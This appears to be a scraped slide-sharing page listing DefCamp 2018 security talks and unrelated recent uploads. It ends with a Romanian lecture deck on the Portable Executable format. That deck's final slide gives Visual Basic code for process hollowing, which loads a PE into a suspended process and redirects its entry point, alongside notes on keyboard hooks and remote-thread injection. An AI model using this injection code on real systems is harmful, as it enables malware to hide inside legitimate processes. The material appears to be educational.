This document discusses threat hunting and practical approaches to threat hunting. It defines threat hunting as proactively searching through data to detect threats that evaded traditional security measures. It argues that threat hunting is more effective than reacting to incidents. The document provides guidance on log collection, developing situational awareness, hunting hosts and networks, maintaining a flexible mindset, and sharing findings. It suggests starting with small data collection and focusing on important systems and network areas. The goal is to understand normal behavior and detect anomalies.
Building application security with 0 money down
Muhammad Mudassar Yamin in Bucharest, Romania on November 8-9th 2018 at DefCamp #9.
The videos and other presentations can be found on https://def.camp/archive
Implementation of information security techniques on modern android based Kio...
Muhammad Mudassar Yamin in Bucharest, Romania on November 8-9th 2018 at DefCamp #9.
The videos and other presentations can be found on https://def.camp/archive
Lattice based Merkle for post-quantum epoch
Maksim Iavich in Bucharest, Romania on November 8-9th 2018 at DefCamp #9.
The videos and other presentations can be found on https://def.camp/archive
The challenge of building a secure and safe digital environment in healthcare
Jelena Milosevic in Bucharest, Romania on November 8-9th 2018 at DefCamp #9.
The videos and other presentations can be found on https://def.camp/archive
Timing attacks against web applications: Are they still practical?
This document discusses the practicality of timing attacks against web applications. It begins by explaining what a timing attack is and detailing the author's plan to conduct one against a target application. The plan involved studying the application's code, pinpointing an exploitable function, collecting timing data, filtering noise, and reducing the search space. The author was able to measure response times and identify spikes but encountered challenges averaging server performance. They demonstrate conducting a timing attack to recover hashed credentials over many requests. Ultimately, while timing attacks can be efficient, they are difficult to execute remotely and most applications and servers have protections that render the attacks impractical. Constant-time algorithms and rate limiting are presented as solutions to prevent these types of attacks.
Tor .onions: The Good, The Rotten and The Misconfigured
Ionut-Cristian Bucur in Bucharest, Romania on November 8-9th 2018 at DefCamp #9.
The videos and other presentations can be found on https://def.camp/archive
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
Ioan Constantin in Bucharest, Romania on November 8-9th 2018 at DefCamp #9.
The videos and other presentations can be found on https://def.camp/archive
We will charge you. How to [b]reach vendor’s network using EV charging station.
This document summarizes a presentation about vulnerabilities found in electric vehicle charging stations. The presentation covered:
1) Several vulnerabilities were found in the Bluetooth and Wi-Fi stacks that could allow access to the vendor's internal network, including arbitrary file writes, command injection, and buffer overflows.
2) The vulnerabilities were disclosed responsibly to the vendor, who developed a detailed plan and released updated firmware within a few months to address all issues.
3) Electric vehicles and charging stations are an important area for continued security research given the protocols for wireless communication, transactions, and vehicle-to-charger interfaces.
Connect & Inspire Cyber Security
Cristian Pațachia-Sultănoiu in Bucharest, Romania on November 8-9th 2018 at DefCamp #9.
The videos and other presentations can be found on https://def.camp/archive
The lions and the watering hole
This document discusses watering hole attacks, a type of cyber attack where hackers compromise frequently visited websites to infect visitors' devices through drive-by exploits. It describes how watering hole attacks work, why they are difficult to detect, and introduces DEKENEAS, an AI-based solution developed by the author to detect watering hole attacks through analyzing obfuscated JavaScript. DEKENEAS trains on over 40,000 malicious redirect samples to recognize behavioral patterns and classify code as malicious or not. When tested on 10,000 new samples and top websites, it achieved 100% detection of unknown implants with no false negatives and a very low false positive rate of 0.00023%.
More from DefCamp (20)
Mobile, IoT, Clouds… It’s time to hire your own risk manager!
Mobile, IoT, Clouds… It’s time to hire your own risk manager!
Internet Balkanization: Why Are We Raising Borders Online?
Internet Balkanization: Why Are We Raising Borders Online?
Secure and privacy-preserving data transmission and processing using homomorp...
Secure and privacy-preserving data transmission and processing using homomorp...
Drupalgeddon 2 – Yet Another Weapon for the Attacker
Drupalgeddon 2 – Yet Another Weapon for the Attacker
Economical Denial of Sustainability in the Cloud (EDOS)
Economical Denial of Sustainability in the Cloud (EDOS)
Threat Hunting: From Platitudes to Practical Application
Threat Hunting: From Platitudes to Practical Application
Implementation of information security techniques on modern android based Kio...
Implementation of information security techniques on modern android based Kio...
The challenge of building a secure and safe digital environment in healthcare
The challenge of building a secure and safe digital environment in healthcare
Timing attacks against web applications: Are they still practical?
Timing attacks against web applications: Are they still practical?
Tor .onions: The Good, The Rotten and The Misconfigured
Tor .onions: The Good, The Rotten and The Misconfigured
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
We will charge you. How to [b]reach vendor’s network using EV charging station.
We will charge you. How to [b]reach vendor’s network using EV charging station.
Recently uploaded
JavaLand 2024: Application Development Green Masterplan
My presentation slides I used at JavaLand 2024
Must Know Postgres Extension for DBA and Developer during Migration
Mydbops Opensource Database Meetup 16
Topic: Must-Know PostgreSQL Extensions for Developers and DBAs During Migration
Speaker: Deepak Mahto, Founder of DataCloudGaze Consulting
Date & Time: 8th June | 10 AM - 1 PM IST
Venue: Bangalore International Centre, Bangalore
Abstract: Discover how PostgreSQL extensions can be your secret weapon! This talk explores how key extensions enhance database capabilities and streamline the migration process for users moving from other relational databases like Oracle.
Key Takeaways:
* Learn about crucial extensions like oracle_fdw, pgtt, and pg_audit that ease migration complexities.
* Gain valuable strategies for implementing these extensions in PostgreSQL to achieve license freedom.
* Discover how these key extensions can empower both developers and DBAs during the migration process.
* Don't miss this chance to gain practical knowledge from an industry expert and stay updated on the latest open-source database trends.
Mydbops Managed Services specializes in taking the pain out of database management while optimizing performance. Since 2015, we have been providing top-notch support and assistance for the top three open-source databases: MySQL, MongoDB, and PostgreSQL.
Our team offers a wide range of services, including assistance, support, consulting, 24/7 operations, and expertise in all relevant technologies. We help organizations improve their database's performance, scalability, efficiency, and availability.
Contact us: info@mydbops.com
Visit: https://www.mydbops.com/
Follow us on LinkedIn: https://in.linkedin.com/company/mydbops
For more details and updates, please follow up the below links.
Meetup Page : https://www.meetup.com/mydbops-databa...
Twitter: https://twitter.com/mydbopsofficial
Blogs: https://www.mydbops.com/blog/
Facebook(Meta): https://www.facebook.com/mydbops/
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
The typical problem in product engineering is not bad strategy, so much as “no strategy”. This leads to confusion, lack of motivation, and incoherent action. The next time you look for a strategy and find an empty space, instead of waiting for it to be filled, I will show you how to fill it in yourself. If you’re wrong, it forces a correction. If you’re right, it helps create focus. I’ll share how I’ve approached this in the past, both what works and lessons for what didn’t work so well.
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
Folding is a recent technique for building efficient recursive SNARKs. Several elegant folding protocols have been proposed, such as Nova, Supernova, Hypernova, Protostar, and others. However, all of them rely on an additively homomorphic commitment scheme based on discrete log, and are therefore not post-quantum secure. In this work we present LatticeFold, the first lattice-based folding protocol based on the Module SIS problem. This folding protocol naturally leads to an efficient recursive lattice-based SNARK and an efficient PCD scheme. LatticeFold supports folding low-degree relations, such as R1CS, as well as high-degree relations, such as CCS. The key challenge is to construct a secure folding protocol that works with the Ajtai commitment scheme. The difficulty, is ensuring that extracted witnesses are low norm through many rounds of folding. We present a novel technique using the sumcheck protocol to ensure that extracted witnesses are always low norm no matter how many rounds of folding are used. Our evaluation of the final proof system suggests that it is as performant as Hypernova, while providing post-quantum security.
Paper Link: https://eprint.iacr.org/2024/257
Dandelion Hashtable: beyond billion requests per second on a commodity server
This slide deck presents DLHT, a concurrent in-memory hashtable. Despite efforts to optimize hashtables, that go as far as sacrificing core functionality, state-of-the-art designs still incur multiple memory accesses per request and block request processing in three cases. First, most hashtables block while waiting for data to be retrieved from memory. Second, open-addressing designs, which represent the current state-of-the-art, either cannot free index slots on deletes or must block all requests to do so. Third, index resizes block every request until all objects are copied to the new index. Defying folklore wisdom, DLHT forgoes open-addressing and adopts a fully-featured and memory-aware closed-addressing design based on bounded cache-line-chaining. This design offers lock-free index operations and deletes that free slots instantly, (2) completes most requests with a single memory access, (3) utilizes software prefetching to hide memory latencies, and (4) employs a novel non-blocking and parallel resizing. In a commodity server and a memory-resident workload, DLHT surpasses 1.6B requests per second and provides 3.5x (12x) the throughput of the state-of-the-art closed-addressing (open-addressing) resizable hashtable on Gets (Deletes).
Biomedical Knowledge Graphs for Data Scientists and Bioinformaticians
Dmitrii Kamaev, PhD
Senior Product Owner - QIAGEN
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
Freshworks creates AI-boosted business software that helps employees work more efficiently and effectively. Managing data across multiple RDBMS and NoSQL databases was already a challenge at their current scale. To prepare for 10X growth, they knew it was time to rethink their database strategy. Learn how they architected a solution that would simplify scaling while keeping costs under control.
Fueling AI with Great Data with Airbyte Webinar
This talk will focus on how to collect data from a variety of sources, leveraging this data for RAG and other GenAI use cases, and finally charting your course to productionalization.
5th LF Energy Power Grid Model Meet-up Slides
5th Power Grid Model Meet-up
It is with great pleasure that we extend to you an invitation to the 5th Power Grid Model Meet-up, scheduled for 6th June 2024. This event will adopt a hybrid format, allowing participants to join us either through an online Mircosoft Teams session or in person at TU/e located at Den Dolech 2, Eindhoven, Netherlands. The meet-up will be hosted by Eindhoven University of Technology (TU/e), a research university specializing in engineering science & technology.
Power Grid Model
The global energy transition is placing new and unprecedented demands on Distribution System Operators (DSOs). Alongside upgrades to grid capacity, processes such as digitization, capacity optimization, and congestion management are becoming vital for delivering reliable services.
Power Grid Model is an open source project from Linux Foundation Energy and provides a calculation engine that is increasingly essential for DSOs. It offers a standards-based foundation enabling real-time power systems analysis, simulations of electrical power grids, and sophisticated what-if analysis. In addition, it enables in-depth studies and analysis of the electrical power grid’s behavior and performance. This comprehensive model incorporates essential factors such as power generation capacity, electrical losses, voltage levels, power flows, and system stability.
Power Grid Model is currently being applied in a wide variety of use cases, including grid planning, expansion, reliability, and congestion studies. It can also help in analyzing the impact of renewable energy integration, assessing the effects of disturbances or faults, and developing strategies for grid control and optimization.
What to expect
For the upcoming meetup we are organizing, we have an exciting lineup of activities planned:
-Insightful presentations covering two practical applications of the Power Grid Model.
-An update on the latest advancements in Power Grid -Model technology during the first and second quarters of 2024.
-An interactive brainstorming session to discuss and propose new feature requests.
-An opportunity to connect with fellow Power Grid Model enthusiasts and users.
The Microsoft 365 Migration Tutorial For Beginner.pptx
This presentation will help you understand the power of Microsoft 365. However, we have mentioned every productivity app included in Office 365. Additionally, we have suggested the migration situation related to Office 365 and how we can help you.
You can also read: https://www.systoolsgroup.com/updates/office-365-tenant-to-tenant-migration-step-by-step-complete-guide/
Mutation Testing for Task-Oriented Chatbots
Conversational agents, or chatbots, are increasingly used to access all sorts of services using natural language. While open-domain chatbots - like ChatGPT - can converse on any topic, task-oriented chatbots - the focus of this paper - are designed for specific tasks, like booking a flight, obtaining customer support, or setting an appointment. Like any other software, task-oriented chatbots need to be properly tested, usually by defining and executing test scenarios (i.e., sequences of user-chatbot interactions). However, there is currently a lack of methods to quantify the completeness and strength of such test scenarios, which can lead to low-quality tests, and hence to buggy chatbots.
To fill this gap, we propose adapting mutation testing (MuT) for task-oriented chatbots. To this end, we introduce a set of mutation operators that emulate faults in chatbot designs, an architecture that enables MuT on chatbots built using heterogeneous technologies, and a practical realisation as an Eclipse plugin. Moreover, we evaluate the applicability, effectiveness and efficiency of our approach on open-source chatbots, with promising results.
AppSec PNW: Android and iOS Application Security with MobSF
Mobile Security Framework - MobSF is a free and open source automated mobile application security testing environment designed to help security engineers, researchers, developers, and penetration testers to identify security vulnerabilities, malicious behaviours and privacy concerns in mobile applications using static and dynamic analysis. It supports all the popular mobile application binaries and source code formats built for Android and iOS devices. In addition to automated security assessment, it also offers an interactive testing environment to build and execute scenario based test/fuzz cases against the application.
This talk covers:
Using MobSF for static analysis of mobile applications.
Interactive dynamic security assessment of Android and iOS applications.
Solving Mobile app CTF challenges.
Reverse engineering and runtime analysis of Mobile malware.
How to shift left and integrate MobSF/mobsfscan SAST and DAST in your build pipeline.
Northern Engraving | Nameplate Manufacturing Process - 2024
Manufacturing custom quality metal nameplates and badges involves several standard operations. Processes include sheet prep, lithography, screening, coating, punch press and inspection. All decoration is completed in the flat sheet with adhesive and tooling operations following. The possibilities for creating unique durable nameplates are endless. How will you create your brand identity? We can help!
Choosing The Best AWS Service For Your Website + API.pptx
Have you ever been confused by the myriad of choices offered by AWS for hosting a website or an API?
Lambda, Elastic Beanstalk, Lightsail, Amplify, S3 (and more!) can each host websites + APIs. But which one should we choose?
Which one is cheapest? Which one is fastest? Which one will scale to meet our needs?
Join me in this session as we dive into each AWS hosting service to determine which one is best for your scenario and explain why!
High performance Serverless Java on AWS- GoTo Amsterdam 2024
Java is for many years one of the most popular programming languages, but it used to have hard times in the Serverless community. Java is known for its high cold start times and high memory footprint, comparing to other programming languages like Node.js and Python. In this talk I'll look at the general best practices and techniques we can use to decrease memory consumption, cold start times for Java Serverless development on AWS including GraalVM (Native Image) and AWS own offering SnapStart based on Firecracker microVM snapshot and restore and CRaC (Coordinated Restore at Checkpoint) runtime hooks. I'll also provide a lot of benchmarking on Lambda functions trying out various deployment package sizes, Lambda memory settings, Java compilation options and HTTP (a)synchronous clients and measure their impact on cold and warm start times.
"Choosing proper type of scaling", Olena Syrota
Imagine an IoT processing system that is already quite mature and production-ready and for which client coverage is growing and scaling and performance aspects are life and death questions. The system has Redis, MongoDB, and stream processing based on ksqldb. In this talk, firstly, we will analyze scaling approaches and then select the proper ones for our system.
Demystifying Knowledge Management through Storytelling
The Department of Veteran Affairs (VA) invited Taylor Paschal, Knowledge & Information Management Consultant at Enterprise Knowledge, to speak at a Knowledge Management Lunch and Learn hosted on June 12, 2024. All Office of Administration staff were invited to attend and received professional development credit for participating in the voluntary event.
The objectives of the Lunch and Learn presentation were to:
- Review what KM ‘is’ and ‘isn’t’
- Understand the value of KM and the benefits of engaging
- Define and reflect on your “what’s in it for me?”
- Share actionable ways you can participate in Knowledge - - Capture & Transfer
Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays, June 2024 with Maria Copot 20
Recently uploaded (20)
JavaLand 2024: Application Development Green Masterplan
JavaLand 2024: Application Development Green Masterplan
Must Know Postgres Extension for DBA and Developer during Migration
Must Know Postgres Extension for DBA and Developer during Migration
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
Dandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity server
Biomedical Knowledge Graphs for Data Scientists and Bioinformaticians
Biomedical Knowledge Graphs for Data Scientists and Bioinformaticians
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
The Microsoft 365 Migration Tutorial For Beginner.pptx
The Microsoft 365 Migration Tutorial For Beginner.pptx
AppSec PNW: Android and iOS Application Security with MobSF
AppSec PNW: Android and iOS Application Security with MobSF
Overcoming the PLG Trap: Lessons from Canva's Head of Sales & Head of EMEA Da...
Overcoming the PLG Trap: Lessons from Canva's Head of Sales & Head of EMEA Da...
Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving | Nameplate Manufacturing Process - 2024
Choosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptx
High performance Serverless Java on AWS- GoTo Amsterdam 2024
High performance Serverless Java on AWS- GoTo Amsterdam 2024
Demystifying Knowledge Management through Storytelling
Demystifying Knowledge Management through Storytelling
Formatul Portable Executable
- 16. Registry
- 17. HHOOK SetWindowsHookEx ( int idHook , HOOKPROC lpfn , HINSTANCE hMod , DWORD dwThreadId ); WH_CALLWNDPROC Installs a hook procedure that monitors messages before the system sends them to the destination window procedure. For more information, see the CallWndProc hook procedure. WH_CBT Installs a hook procedure that receives notifications useful to a computer-based training (CBT) application. For more information, see the CBTProc hook procedure. WH_KEYBOARD Installs a hook procedure that monitors keystroke messages. For more information, see the KeyboardProc hook procedure. SetWindowsHookEx
- 18. CreateRemoteThread HANDLE WINAPI CreateRemoteThread( __in HANDLE hProcess , __in LPSECURITY_ATTRIBUTES lpThreadAttributes , __in SIZE_T dwStackSize , __in LPTHREAD_START_ROUTINE lpStartAddress , __in LPVOID lpParameter , __in DWORD dwCreationFlags , __out LPDWORD lpThreadId );
- 20. Exemplu API
- 21. Load PE File CopyMemory idh, abExeFile(0), Len(idh) If idh.e_magic <> IMAGE_DOS_SIGNATURE Then MsgBox "MZ signature not found!", vbCritical, "File load error" Exit Sub End If CopyMemory inh, abExeFile(idh.e_lfanew), Len(inh) If inh.Signature <> IMAGE_NT_SIGNATURE Then MsgBox "PE signature not found!", vbCritical, "File load error" Exit Sub End If si.cb = Len(si) If CreateProcess(vbNullString, fisier, 0, 0, False, CREATE_SUSPENDED, 0, 0, si, pi) = 0 Then Exit Sub context.ContextFlags = CONTEXT86_INTEGER If GetThreadContext(pi.hThread, context) = 0 Then GoTo ClearProcess Call ReadProcessMemory(pi.hProcess, ByVal context.Ebx + 8, addr, 4, 0) If addr = 0 Then GoTo ClearProcess If ZwUnmapViewOfSection(pi.hProcess, addr) Then GoTo ClearProcess ImageBase = VirtualAllocEx(pi.hProcess, ByVal inh.OptionalHeader.ImageBase, inh.OptionalHeader.SizeOfImage, MEM_RESERVE Or MEM_COMMIT, PAGE_READWRITE) If ImageBase = 0 Then GoTo ClearProcess Call WriteProcessMemory(pi.hProcess, ByVal ImageBase, abExeFile(0), inh.OptionalHeader.SizeOfHeaders, ret) lOffset = idh.e_lfanew + Len(inh) For i = 0 To inh.FileHeader.NumberOfSections - 1 CopyMemory ish, abExeFile(lOffset + i * Len(ish)), Len(ish) Call WriteProcessMemory(pi.hProcess, ByVal ImageBase + ish.VirtualAddress, abExeFile(ish.PointerToRawData), ish.SizeOfRawData, ret) Call VirtualProtectEx(pi.hProcess, ByVal ImageBase + ish.VirtualAddress, ish.VirtualSize, Protect(ish.characteristics), addr) Next i Call WriteProcessMemory(pi.hProcess, ByVal context.Ebx + 8, ImageBase, 4, ret) context.Eax = ImageBase + inh.OptionalHeader.AddressOfEntryPoint Call SetThreadContext(pi.hThread, context) Call ResumeThread(pi.hThread) Exit Sub